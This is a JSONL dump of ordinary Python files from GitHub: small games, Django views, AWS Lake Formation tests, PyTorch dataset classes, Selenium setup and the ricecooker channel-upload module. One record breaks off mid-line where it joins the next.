print(self.__calefactores[i])\n","repo_name":"Arty4267/2022","sub_path":"Ejercicio 4 Unidad 3/ClaseColeccion.py","file_name":"ClaseColeccion.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"73219625795","text":"#importing libraries\r\nfrom appJar import gui\r\n\r\n#defining variables\r\nplayerStats = [100]\r\nenemies = [[\"Oil spill\", 50], [\"Plastic bag\", 70], [\"litter\", 80]]\r\nposx = 1\r\nposy = 1\r\n\r\n#Class\r\nclass Game:\r\n    def __init__(self, playerHealth, enemyName, enemyHealth):\r\n        self.playerHealth = playerHealth\r\n        self.enemyName = enemyName\r\n        self.enemyHealth = enemyHealth\r\n    \r\n    def start(self):\r\n        
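# rebuild the screen for the current tile; only moves that stay on the 6x6 grid get a button\r\n        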
app.removeAllWidgets()\r\n        app.addLabel(\"Position: \"+str(posx)+\",\"+str(posy))\r\n        if posx != 1:\r\n            app.addButton(\"Turn left\", press, 2,0)\r\n        if posx != 6:\r\n            app.addButton(\"Turn right\", press, 2,2)\r\n        if posy != 1:\r\n            app.addButton(\"Go back\", press, 3,1)\r\n        if posy != 6:\r\n            app.addButton(\"Go forward\", press, 1,1)\r\n    \r\n    def battle(self):\r\n        pass\r\n    \r\n    \r\ndef press(button):\r\n    global posx\r\n    global posy\r\n    if button == \"start\":\r\n        Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n    if button == \"Turn left\":\r\n        posx -= 1\r\n        Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n    if button == \"Turn right\":\r\n        posx += 1\r\n        Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n    if button == \"Go back\":\r\n        posy -= 1\r\n        Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n    if button == \"Go forward\":\r\n        posy += 1\r\n        Game(playerStats[0], (enemies[0])[0], (enemies[0])[1]).start()\r\n\r\n#set up GUI\r\napp = gui(\"Game\", \"1000x800\")\r\napp.setFont(20)\r\n\r\napp.addLabel(\"Welcome\")\r\napp.addButton(\"start\", press)\r\n\r\napp.go() #Starts the GUI\r\n","repo_name":"JedAtkinson/TED31-Programming-Assessment","sub_path":"Asessment_v1.py","file_name":"Asessment_v1.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"23996638857","text":"#!/usr/bin/env python3\nimport os\nimport boto3\nfrom utils import *\nfrom tests import *\n\nif not bucket_exists(artifacts_bucket):\n    create_artifacts_bucket()\n    upload_directory_s3('cfn/', artifacts_bucket)\n    deploy_stack('datalake1', 'datalake1-stack')\n    change_datalake_default_security_settings()  # CreateTableDefaultPermissions not supported in cfn\n    deploy_stack('datalake2', 'datalake2-stack')\n\nfor i, test in enumerate(tests):\n    user_name = 'test%d-user' % i\n    delete_stack('test%d-lf-stack' % i)\n    delete_stack('test%d-stack' % i)\n    deploy_stack('iam-user', 'test%d-stack' % i, userName=user_name)\n    deploy_stack(\n        'lakeformation-permissions',\n        'test%d-lf-stack' % i,\n        userName=user_name,\n        shownColumns=test['initial']['shownColumns'],\n        hiddenColumns=test['initial']['hiddenColumns'])\n    if 'updateWith' in test:\n        update_stack(\n            'lakeformation-permissions',\n            'test%d-lf-stack' % i,\n            userName=user_name,\n            shownColumns=test['updateWith']['shownColumns'],\n            hiddenColumns=test['updateWith']['hiddenColumns'])\n    access_key_id, secret_access_key = recreate_access_keys(user_name)\n    athena = boto3.client('athena', aws_access_key_id=access_key_id, aws_secret_access_key=secret_access_key)\n    run_test(i, athena)","repo_name":"sviscaino/aws-lakeformation-cloudformation-tests","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"70204282435","text":"class Solution:\n    def partitionArray(self, nums: list[int], k: int) -> int:\n        def test(target):\n            list1 = nums.copy()\n            tot=0\n            p=0\n            while p<len(list1):\n                left=p\n                right=len(list1)-1\n                while left<right:\n                    mid=(left+right+1)//2\n                    if list1[mid]-list1[p]>k:\n                        right=mid-1\n                    else:\n                        left=mid\n                p=left+1\n                tot+=1\n            return tot<=target\n        nums.sort()\n        left=1\n        right=len(nums)\n        while left HttpResponse:\n    try:\n        sort_string = request.GET[\"sort-string\"]\n    except KeyError:\n        sort_string = \"created_at\"\n\n    twits = get_twits_to_index_page(profile=request.user, sort_string=sort_string)\n    try:\n        page_num = request.GET[\"page\"]\n    except KeyError:\n        page_num = 1\n\n    paginator = CustomPaginator(max_value=20)\n    try:\n        
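# paginate() raises PaginationError when the requested page does not exist\n        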
twits_paginator = paginator.paginate(data=twits, page_num=page_num)\n except PaginationError:\n return HttpResponseBadRequest(\n content=\"Page with provided number doesn't exist.\"\n )\n\n context = {\n \"title\": \"MICROBLOG\",\n \"twits\": twits_paginator,\n \"sort_string\": sort_string,\n }\n return render(request=request, template_name=\"index.html\", context=context)\n","repo_name":"EugeniRosh/microblogging","sub_path":"src/microblogging/core/presentation/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33591312098","text":"# -*- coding:utf-8 -*-\n# __author__ = 'CaoRui'\nfrom ChannelGeneration import HchannelGeneration\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import optimize\n\ndef fmax(x, a, b):\n return a*(x**b)\n\nif __name__ == '__main__':\n x = np.array([0, 5, 10, 15, 20, 25, 30, 35, 40])\n x1 = np.arange(0, 40, 1)\n y1 = np.logspace(0,9,9,base=2)\n y2 = np.logspace(0,8,9,base=2)\n y3 = np.logspace(0,7,9,base=2)\n y4 = np.logspace(0,6,9,base=2)\n fita1, fitb1 = optimize.curve_fit(fmax, x, y1, [1, 1])\n fita2, fitb2 = optimize.curve_fit(fmax, x, y2, [1, 1])\n fita3, fitb3 = optimize.curve_fit(fmax, x, y3, [1, 1])\n fita4, fitb4 = optimize.curve_fit(fmax, x, y4, [1, 1])\n plot1 ,= plt.plot(x1, fmax(x1, fita1[0], fita1[1]), 'r-.')\n plot2 ,= plt.plot(x1, fmax(x1, fita2[0], fita2[1]), 'bs')\n plot3 ,= plt.plot(x1, fmax(x1, fita3[0], fita3[1]), 'g^')\n plot4 ,= plt.plot(x1, fmax(x1, fita4[0], fita4[1]), 'k--')\n plt.legend([plot1, plot2, plot3, plot4],[\"Ma\",\"fg\",\"sdf\",\"er\"],loc=2,borderaxespad=0.)\n plt.title('System SumRate')\n plt.xlabel('SNR_DB')\n plt.ylabel('Sum Rate')\n plt.show()\n","repo_name":"AlienWareLeaguen/InterferenceAlignment","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11319570007","text":"from selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\n\n\ndef config_and_run_browser(config: dict):\n if config['browser'] == 'Chrome':\n options = ChromeOptions()\n desired_capabilities = DesiredCapabilities.CHROME\n selen_server_url = config['gitlab_chrome_url']\n\n if config['browser'] == 'Firefox':\n options = FirefoxOptions()\n desired_capabilities = DesiredCapabilities.FIREFOX\n selen_server_url = config['gitlab_firefox_url']\n\n if config['env'] == 'local':\n selen_server_url = config['local_url']\n\n if config['browser_mode'] == 'headless':\n options.add_argument('--headless')\n\n driver = webdriver.Remote(\n command_executor=selen_server_url,\n desired_capabilities=desired_capabilities,\n options=options)\n\n driver.implicitly_wait(config['implicitly_wait'])\n driver.maximize_window()\n #driver.get(config['site_url'])\n\n return driver\n","repo_name":"arkuz/messenger_tests_web","sub_path":"helpers/browser_setup.py","file_name":"browser_setup.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42265478027","text":"import json\nimport random\nimport sys\nimport webbrowser\n\nimport requests\nfrom requests.exceptions import HTTPError\n\nfrom . 
import __version__\nfrom . import config\nfrom .classes.nodes import ChannelNode\nfrom .managers.progress import RestoreManager\nfrom .managers.progress import Status\nfrom .managers.tree import ChannelManager\n\n# Fix to support Python 2.x.\n# http://stackoverflow.com/questions/954834/how-do-i-use-raw-input-in-python-3\ntry:\n input = raw_input\nexcept NameError:\n pass\n\n\ndef uploadchannel_wrapper(chef, args, options):\n \"\"\"\n Call the `uploadchannel` function with combined `args` and `options`.\n Args:\n args (dict): chef command line arguments\n options (dict): extra key=value options given on the command line\n \"\"\"\n args_and_options = args.copy()\n args_and_options.update(options)\n uploadchannel(chef, **args_and_options)\n\n\ndef uploadchannel( # noqa: C901\n chef,\n command=\"uploadchannel\",\n update=False,\n thumbnails=False,\n download_attempts=3,\n resume=False,\n step=Status.LAST.name,\n token=\"#\",\n prompt=False,\n publish=False,\n compress=False,\n stage=False,\n **kwargs\n):\n \"\"\"uploadchannel: Upload channel to Kolibri Studio\n Args:\n chef (SushiChef subclass): class that implements the construct_channel method\n command (str): the action we want to perform in this run\n update (bool): indicates whether to re-download files (optional)\n thumbnails (bool): indicates whether to automatically derive thumbnails from content (optional)\n download_attempts (int): number of times to retry downloading files (optional)\n resume (bool): indicates whether to resume last session automatically (optional)\n step (str): step to resume process from (optional)\n token (str): content server authorization token\n prompt (bool): indicates whether to prompt user to open channel when done (optional)\n publish (bool): indicates whether to automatically publish channel (optional)\n compress (bool): indicates whether to compress larger files (optional)\n stage (bool): indicates whether to stage rather than deploy channel (optional)\n kwargs (dict): extra keyword args will be passed to construct_channel (optional)\n Returns: (str) link to access newly created channel\n \"\"\"\n\n # Set configuration settings\n config.UPDATE = update\n config.COMPRESS = chef.get_setting(\"compress\", False)\n config.VIDEO_HEIGHT = chef.get_setting(\"video-height\", None)\n config.THUMBNAILS = chef.get_setting(\"thumbnails\", False)\n config.STAGE = stage\n config.PUBLISH = publish\n\n # Set max retries for downloading\n config.DOWNLOAD_SESSION.mount(\n \"http://\", requests.adapters.HTTPAdapter(max_retries=int(download_attempts))\n )\n config.DOWNLOAD_SESSION.mount(\n \"https://\", requests.adapters.HTTPAdapter(max_retries=int(download_attempts))\n )\n\n # Get domain to upload to\n config.init_file_mapping_store()\n\n if not command == \"dryrun\":\n # Authenticate user and check current Ricecooker version\n username, token = authenticate_user(token)\n config.LOGGER.info(\"Logged in with username {0}\".format(username))\n check_version_number()\n else:\n username = \"\"\n token = \"\"\n\n config.LOGGER.info(\"\\n\\n***** Starting channel build process *****\\n\\n\")\n\n # Set up progress tracker\n config.PROGRESS_MANAGER = RestoreManager()\n if (\n not resume or not config.PROGRESS_MANAGER.check_for_session()\n ) and step.upper() != Status.DONE.name:\n config.PROGRESS_MANAGER.init_session()\n else:\n if resume or prompt_yes_or_no(\n \"Previous session detected. 
Would you like to resume your last session?\"\n        ):\n            config.LOGGER.info(\"Resuming your last session...\")\n            step = Status.LAST.name if step is None else step\n            config.PROGRESS_MANAGER = config.PROGRESS_MANAGER.load_progress(\n                step.upper()\n            )\n        else:\n            config.PROGRESS_MANAGER.init_session()\n\n    if hasattr(chef, \"download_content\"):\n        chef.download_content()\n\n    # TODO load csv if exists\n    metadata_dict = chef.load_channel_metadata_from_csv()\n\n    # Construct channel if it hasn't been constructed already\n    if config.PROGRESS_MANAGER.get_status_val() <= Status.CONSTRUCT_CHANNEL.value:\n        config.LOGGER.info(\"Calling construct_channel... \")\n        channel = chef.construct_channel(**kwargs)\n        if \"sample\" in kwargs and kwargs[\"sample\"]:\n            channel = select_sample_nodes(channel, size=kwargs[\"sample\"])\n        config.PROGRESS_MANAGER.set_channel(channel)\n    channel = config.PROGRESS_MANAGER.channel\n\n    # Set initial tree if it hasn't been set already\n    if config.PROGRESS_MANAGER.get_status_val() <= Status.CREATE_TREE.value:\n        config.PROGRESS_MANAGER.set_tree(create_initial_tree(channel))\n    tree = config.PROGRESS_MANAGER.tree\n\n    # Download files if they haven't been downloaded already\n    if config.PROGRESS_MANAGER.get_status_val() <= Status.DOWNLOAD_FILES.value:\n        config.LOGGER.info(\"\")\n        config.LOGGER.info(\"Downloading files...\")\n        config.PROGRESS_MANAGER.set_files(*process_tree_files(tree))\n\n    # Apply any modifications to chef\n    chef.apply_modifications(channel, metadata_dict)\n    # Save the data about the current run in chefdata/\n    chef.save_channel_tree_as_json(channel)\n\n    chef.save_channel_metadata_as_csv(channel)\n\n    if command == \"dryrun\":\n        config.LOGGER.info(\"Command is dryrun so we are not uploading channel.\")\n        return\n\n    # Set download manager in case steps were skipped\n    files_to_diff = config.PROGRESS_MANAGER.files_downloaded\n    config.FAILED_FILES = config.PROGRESS_MANAGER.files_failed\n\n    # Get file diff if it hasn't been generated already\n    if config.PROGRESS_MANAGER.get_status_val() <= Status.GET_FILE_DIFF.value:\n        config.LOGGER.info(\"\")\n        config.LOGGER.info(\"Getting file diff...\")\n        config.PROGRESS_MANAGER.set_diff(get_file_diff(tree, files_to_diff))\n    file_diff = config.PROGRESS_MANAGER.file_diff\n\n    # Set which files have already been uploaded\n    tree.uploaded_files = config.PROGRESS_MANAGER.files_uploaded\n\n    # Upload files if they haven't been uploaded already\n    if config.PROGRESS_MANAGER.get_status_val() <= Status.UPLOADING_FILES.value:\n        config.LOGGER.info(\"\")\n        config.LOGGER.info(\"Uploading files...\")\n        config.PROGRESS_MANAGER.set_uploaded(upload_files(tree, file_diff))\n\n    # Create channel on Kolibri Studio if it hasn't been created already\n    if config.PROGRESS_MANAGER.get_status_val() <= Status.UPLOAD_CHANNEL.value:\n        config.LOGGER.info(\"\")\n        config.LOGGER.info(\"Creating channel...\")\n        config.PROGRESS_MANAGER.set_channel_created(*create_tree(tree))\n    channel_link = config.PROGRESS_MANAGER.channel_link\n    channel_id = config.PROGRESS_MANAGER.channel_id\n\n    # Publish tree if flag is set to True\n    if (\n        config.PUBLISH\n        and config.PROGRESS_MANAGER.get_status_val() <= Status.PUBLISH_CHANNEL.value\n    ):\n        config.LOGGER.info(\"\")\n        config.LOGGER.info(\"Publishing channel...\")\n        publish_tree(tree, channel_id)\n        config.PROGRESS_MANAGER.set_published()\n\n    # Open link on web browser (if specified) and return new link\n    config.LOGGER.info(\"\\n\\nDONE: Channel created at {0}\\n\".format(channel_link))\n    if prompt and prompt_yes_or_no(\"Would you like to open your channel now?\"):\n        config.LOGGER.info(\"Opening channel... \")\n        webbrowser.open_new_tab(channel_link)\n\n    config.PROGRESS_MANAGER.set_done()\n    return channel_link\n\n\ndef authenticate_user(token):\n    \"\"\"\n    This function adds the studio Authorization `token` header to `config.SESSION`\n    and checks if the token is valid by performing a test call on the Studio API.\n    Args:\n        token (str): Studio authorization token\n    Returns:\n        username, token: Studio username and token if authentication worked\n    \"\"\"\n    config.SESSION.headers.update({\"Authorization\": \"Token {0}\".format(token)})\n    auth_endpoint = config.authentication_url()\n    try:\n        response = config.SESSION.post(auth_endpoint)\n        response.raise_for_status()\n        user = json.loads(response._content.decode(\"utf-8\"))\n        return user[\"username\"], token\n    except HTTPError:\n        config.LOGGER.error(\"Studio token rejected by server \" + auth_endpoint)\n        sys.exit()\n\n\ndef check_version_number():\n    response = config.SESSION.post(\n        config.check_version_url(), data=json.dumps({\"version\": __version__})\n    )\n    response.raise_for_status()\n    result = json.loads(response._content.decode(\"utf-8\"))\n\n    if result[\"status\"] == 0:\n        config.LOGGER.info(result[\"message\"])\n    elif result[\"status\"] == 1:\n        config.LOGGER.warning(result[\"message\"])\n    elif result[\"status\"] == 2:\n        config.LOGGER.error(result[\"message\"])\n        if not prompt_yes_or_no(\"Continue anyways?\"):\n            sys.exit()\n    else:\n        config.LOGGER.error(result[\"message\"])\n        sys.exit()\n\n\ndef prompt_yes_or_no(message):\n    \"\"\"prompt_yes_or_no: Prompt user to reply with a y/n response\n    Args: None\n    Returns: None\n    \"\"\"\n    user_input = input(\"{} [y/n]:\".format(message)).lower()\n    if user_input.startswith(\"y\"):\n        return True\n    elif user_input.startswith(\"n\"):\n        return False\n    else:\n        return prompt_yes_or_no(message)\n\n\ndef create_initial_tree(channel):\n    \"\"\"create_initial_tree: Create initial tree structure\n    Args:\n        channel (Channel): channel to construct\n    Returns: tree manager to run rest of steps\n    \"\"\"\n    # Create channel manager with channel data\n    config.LOGGER.info(\"   Setting up initial channel structure... 
\")\n tree = ChannelManager(channel)\n\n # Make sure channel structure is valid\n config.LOGGER.info(\" Validating channel structure...\")\n channel.print_tree()\n tree.validate()\n config.LOGGER.info(\" Tree is valid\")\n return tree\n\n\ndef process_tree_files(tree):\n \"\"\"process_tree_files: Download files from nodes\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n Returns: None\n \"\"\"\n # Fill in values necessary for next steps\n config.LOGGER.info(\"Processing content...\")\n files_to_diff = tree.process_tree(tree.channel)\n tree.check_for_files_failed()\n return files_to_diff, config.FAILED_FILES\n\n\ndef get_file_diff(tree, files_to_diff):\n \"\"\"get_file_diff: Download files from nodes\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n Returns: list of files that are not on Kolibri Studio\n \"\"\"\n # Determine which files have not yet been uploaded to the CC server\n config.LOGGER.info(\" Checking if files exist on Kolibri Studio...\")\n file_diff = tree.get_file_diff(files_to_diff)\n return file_diff\n\n\ndef upload_files(tree, file_diff):\n \"\"\"upload_files: Upload files to Kolibri Studio\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n file_diff ([str]): list of files to upload\n Returns: None\n \"\"\"\n # Upload new files to CC\n config.LOGGER.info(\n \" Uploading {0} new file(s) to Kolibri Studio...\".format(len(file_diff))\n )\n tree.upload_files(file_diff)\n tree.reattempt_upload_fails()\n return file_diff\n\n\ndef create_tree(tree):\n \"\"\"create_tree: Upload tree to Kolibri Studio\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n Returns: channel id of created channel and link to channel\n \"\"\"\n # Create tree\n config.LOGGER.info(\"Creating tree on Kolibri Studio...\")\n channel_id, channel_link = tree.upload_tree()\n return channel_link, channel_id\n\n\ndef publish_tree(tree, channel_id):\n \"\"\"publish_tree: Publish tree to Kolibri\n Args:\n tree (ChannelManager): manager to handle communication to Kolibri Studio\n channel_id (str): id of channel to publish\n Returns: None\n \"\"\"\n config.LOGGER.info(\"Publishing tree to Kolibri... \")\n tree.publish(channel_id)\n\n\ndef select_sample_nodes(channel, size=10, seed=42): # noqa: C901\n \"\"\"\n Build a sample tree of `size` leaf nodes from the channel `channel` to use\n for debugging chef functionality without uploading the whole tree.\n \"\"\"\n config.LOGGER.info(\"Selecting a sample of size \" + str(size))\n\n # Step 1. channel to paths\n node_paths = [] # list of tuples of the form (topic1, topic2, leafnode)\n\n def walk_tree(parents_path, subtree):\n for child in subtree.children:\n child_path = parents_path + (child,)\n if child.children:\n # recurse\n walk_tree(child_path, child)\n else:\n # emit leaf node\n node_paths.append(child_path)\n\n walk_tree((), channel)\n\n # Step 2. sample paths\n random.seed(seed)\n sample_paths = random.sample(node_paths, size)\n for node_path in sample_paths:\n for node in node_path:\n if node.children:\n node.children = [] # empty children to clear old tree structure\n\n # Step 3. 
paths to channel_sample\n    channel_sample = ChannelNode(\n        source_domain=channel.source_domain,\n        source_id=channel.source_id + \"-sample\",\n        title=\"Sample from \" + channel.title,\n        thumbnail=channel.thumbnail,\n        language=channel.language,\n        description=\"Sample from \" + channel.description,\n    )\n\n    def attach(parent, node_path):\n        if len(node_path) == 1:\n            # leaf node\n            parent.add_child(node_path[0])\n        else:\n            child = node_path[0]\n            if not any(c.source_id == child.source_id for c in parent.children):\n                parent.add_child(child)\n            attach(child, node_path[1:])\n\n    for node_path in sample_paths:\n        attach(channel_sample, node_path)\n\n    return channel_sample\n","repo_name":"learningequality/ricecooker","sub_path":"ricecooker/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":14047,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"}
{"seq_id":"7525255135","text":"from swiftly.runtime.python.main import detect_python, run_check\n\nRUNTIME_CONFIG = {\n    \"name\": \"python\",\n    \n    # a python function that detects if runtime is the current runtime (in this case, detect if it's a python runtime)\n    \"detect\": detect_python,\n    \n    # a list of custom functions. \"command\": \"shell/bat function name\"\n    \"custom\": {},\n    \n    \"run_check\": run_check,\n    \n    # Allowed framework types, and its configuration\n    \"allowed_framework_types\": [\n        {\n            \"name\": \"web\",\n            \"exclusive\": True, # only one of a kind in every project\n        },\n        \n        {\n            \"name\": \"ai\",\n            \"exclusive\": False,\n        },\n        \n        {\n            \"name\": \"others\",\n            \"exclusive\": False,\n        },\n    ]\n}","repo_name":"brainspoof/swiftly-sys","sub_path":"swiftly/runtime/python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
{"seq_id":"25230103331","text":"import torch\nimport torchvision\nimport numpy as np\nfrom utils import *\nimport os\nimport random\n\nclass FlowSpeedData_new(torch.utils.data.Dataset):\n    def __init__(self, flow_path, label_path, down_sample_rate):\n        super().__init__()\n        self.flow = []\n        self.label = []\n        all_flow = sorted(os.listdir(flow_path))\n        for flo in all_flow:\n            flow_tensor = read_flow(os.path.join(flow_path, flo))\n            \n            # down sampling the flow\n            _, image_H, image_W = flow_tensor.shape\n            resizer = torchvision.transforms.Resize((image_H // down_sample_rate, image_W // down_sample_rate))\n            down_flow = resizer(flow_tensor)\n            self.flow.append(down_flow)  # store the down-sampled flow; appending flow_tensor here would discard the resize\n            \n            file_name = flo[:20]\n            sample_id = int(flo[-8:-4])\n            for l in os.listdir(label_path):\n                if l.startswith(file_name):\n                    label_arr = torch.load(os.path.join(label_path, l))\n                    label_arr = label_arr[\"speed\"]\n                    speed = label_arr[sample_id]\n                    self.label.append(speed)\n    \n    def __len__(self):\n        return len(self.flow)\n    \n    def __getitem__(self, i):\n        return self.flow[i], self.label[i]\n\n\n\n### discarded. Process data from the old small data set\ndef get_flow_label(flow_path, label_path, sample_rate, down_sample_rate):\n    flow = []\n    label = []\n    all_flow = sorted(os.listdir(flow_path))\n    for f in sorted(os.listdir(label_path)):\n        if f.endswith(\".txt\"):\n            f_num = f[0]\n            \n            # filter the label\n            cur_label = np.loadtxt(os.path.join(label_path, f))\n            enum = np.arange(cur_label.shape[0]).reshape(-1,1)\n            cur_label = np.hstack((enum, cur_label))\n            cur_label = cur_label[:-2:sample_rate]\n            cur_label = np.array([row for row in cur_label if not np.isnan(row[1])])\n            \n            # find flows that match the label\n            for l in cur_label:\n                label.append(l[1:])\n                valid_flow = \"\"\n                for flow_f in all_flow:\n                    if flow_f[0] == f_num and int(flow_f[2:6]) == int(l[0]):\n                        valid_flow = flow_f\n                flow_tensor = read_flow(os.path.join(flow_path, valid_flow))\n                \n                # down sampling the flow\n                _, image_H, image_W = flow_tensor.shape\n                resizer = torchvision.transforms.Resize((image_H // down_sample_rate, image_W // down_sample_rate))\n                down_flow = resizer(flow_tensor)\n                flow.append(down_flow)\n                \n    return flow, label\n\n### discarded. Process data from the old small data set\nclass FlowSpeedData(torch.utils.data.Dataset):\n    def __init__(self, flow_path, label_path, sample_rate, down_sample_rate):\n        super().__init__()\n        self.sample_rate = sample_rate\n        self.flow_path = flow_path\n        self.label_path = label_path\n        self.flow, self.label = get_flow_label(flow_path, label_path, sample_rate, down_sample_rate)\n    \n    def __len__(self):\n        return len(self.flow)\n    \n    def __getitem__(self, i):\n        return self.flow[i], self.label[i]\n\nclass TKitti(torchvision.datasets.KittiFlow):\n    def __init__(self, root):\n        super().__init__(root=root)\n    \n    def __getitem__(self, index):\n        img1, img2, flow, valid_flow_mask = super().__getitem__(index)\n        if (random.random() > 0.5):\n            change_brightness = random.uniform(0.5, 1.5)\n            img1 = torchvision.transforms.functional.adjust_brightness(img1, change_brightness)\n            img2 = torchvision.transforms.functional.adjust_brightness(img2, change_brightness)\n        \n        if (random.random() > 0.5):\n            change_contrast = random.uniform(0.5, 1.5)\n            img1 = torchvision.transforms.functional.adjust_contrast(img1, change_contrast)\n            img2 = torchvision.transforms.functional.adjust_contrast(img2, change_contrast)\n        \n        flow = torch.from_numpy(flow)\n        valid_flow_mask = torch.from_numpy(valid_flow_mask)\n        img1 = torchvision.transforms.ToTensor()(img1)\n        img2 = torchvision.transforms.ToTensor()(img2)\n        \n        height = 368\n        width = 1232\n        img1 = torchvision.transforms.functional.crop(img1, 0, 0, height, width)\n        img2 = torchvision.transforms.functional.crop(img2, 0, 0, height, width)\n        flow = torchvision.transforms.functional.crop(flow, 0, 0, height, width)\n        valid_flow_mask = torchvision.transforms.functional.crop(valid_flow_mask, 0, 0, height, width)\n        return img1, img2, flow, valid_flow_mask\n\n","repo_name":"shawwwwnK/Speed_Estimation_with_Optical_Flow","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"3763849530","text":"from django.shortcuts import redirect\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views.generic import DetailView\nfrom django_filters.views import FilterView\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom task_manager.mixins import RedirectToLoginMixin\nfrom django.contrib import messages\nfrom django.urls import 
reverse_lazy\nfrom .models import Task\nfrom .filters import TasksFilter\nfrom django.utils.translation import gettext as _\n\n\nclass TasksIndex(RedirectToLoginMixin, FilterView):\n template_name = 'manage/index/tasks_index.html'\n filterset_class = TasksFilter\n context_object_name = 'tasks'\n\n\nclass TasksShow(RedirectToLoginMixin, DetailView):\n template_name = 'manage/show_task.html'\n model = Task\n context_object_name = 'task'\n pk_url_kwarg = 'task_id'\n\n\nclass TasksCreate(SuccessMessageMixin, RedirectToLoginMixin, CreateView):\n template_name = 'manage/create.html'\n model = Task\n success_url = reverse_lazy('tasks_index')\n fields = ['name', 'description', 'status', 'executor', 'labels']\n success_message = _('Task created successfully')\n extra_context = {\n 'page_title': _('Create task'),\n 'url_path': 'tasks_create',\n 'button_text': _('Create'),\n }\n\n def form_valid(self, form):\n form.instance.author_id = self.request.user.id\n return super().form_valid(form)\n\n\nclass TasksUpdate(SuccessMessageMixin, RedirectToLoginMixin, UpdateView):\n template_name = 'manage/update.html'\n model = Task\n success_url = reverse_lazy('tasks_index')\n fields = ['name', 'description', 'status', 'executor', 'labels']\n context_object_name = 'current_object'\n pk_url_kwarg = 'task_id'\n success_message = _('Task updated successfully')\n extra_context = {\n 'page_title': _('Update task'),\n 'url_path': 'tasks_update',\n }\n\n\nclass TasksDelete(SuccessMessageMixin, RedirectToLoginMixin, DeleteView):\n template_name = 'manage/delete.html'\n model = Task\n success_url = reverse_lazy('tasks_index')\n context_object_name = 'current_object'\n pk_url_kwarg = 'task_id'\n success_message = _('Task deleted successfully')\n extra_context = {\n 'object_group': _('Task')\n }\n\n def dispatch(self, request, *args, **kwargs):\n # Only author can delete task\n if request.user.id != self.get_object().author.id:\n messages.error(self.request, _('Only author can delete this task'))\n return redirect(reverse_lazy('tasks_index'))\n return super().dispatch(request, *args, **kwargs)\n","repo_name":"dmitriy-ga/python-project-52","sub_path":"task_manager/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25581769714","text":"from sbmlmath import SBMLMathMLPrinter, SpeciesSymbol\n\n\ndef test_species_symbol_repr_type():\n sym = SpeciesSymbol(\"A\", representation_type=\"sum\")\n mathml = SBMLMathMLPrinter().doprint(sym)\n assert mathml == (\n '\\n'\n '\\n'\n 'A'\n \"\"\n )\n\n\ndef test_species_symbol_spec_ref():\n sym = SpeciesSymbol(\"A\", species_reference=\"ref_to_A\")\n mathml = SBMLMathMLPrinter().doprint(sym)\n assert mathml == (\n '\\n'\n '\\n'\n 'A'\n \"\"\n )\n","repo_name":"dweindl/sbmlmath","sub_path":"tests/test_printer.py","file_name":"test_printer.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}